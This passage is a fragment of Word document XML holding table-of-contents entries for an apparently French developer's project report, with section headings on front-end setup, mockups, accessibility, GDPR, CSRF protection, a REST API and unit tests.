        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>10</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="14FE3D38" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817744" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>5. RÉALISATIONS FRONT-END</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817744 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>10</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="787F441D" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817745" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>5.1 Installation et configuration de l'environnement de travail</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817745 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>10</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="45650445" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817746" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Mise en place avec Docker Compose</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817746 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>10</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4F61AF18" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817747" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Un outil d'administration pour faciliter le développement</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817747 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>11</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7187185D" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817748" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Éditeur et configuration</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817748 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>11</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="66BE9029" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817749" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>5.2 Maquettage des interfaces utilisateur</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817749 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>11</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="37AD4FC9" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817750" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>5.2.1 Outil de maquettage utilisé</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817750 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>11</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0EDA9229" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817751" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>5.2.2 Maquettes de l'application (version web)</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817751 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>11</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="01CB0181" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817754" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>5.2.5 Prise en compte de l'accessibilité (RGAA)</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817754 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>12</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6405517B" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817755" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>5.2.6 Prise en compte du RGPD</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817755 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>12</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3B13CE8D" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817756" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>5.3 Réalisation des interfaces utilisateur statiques</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817756 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>12</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="01E7D32A" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817757" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>5.3.1 Interface statique n°1 – Page d'accueil</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817757 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>12</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="359CA0DD" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817758" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>5.3.2 Interface statique n°2 – Formulaire de devis</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817758 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>13</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="54D41760" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817759" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>5.4 Développement de la partie dynamique des interfaces</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817759 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>13</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6791AD97" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817760" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>5.4.1 Traitement dynamique n°1 – Chargement dynamique des sélects</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817760 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>13</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5ABD7363" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817761" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>5.4.2 Traitement dynamique n°2 – Protection CSRF des actions sensibles</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817761 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>14</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="31008EA2" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817762" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>5.4.3 Utilisation d'une API REST</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817762 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>14</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7D6CA561" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817763" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>5.4.4 Tests unitaires front-end</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817763 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
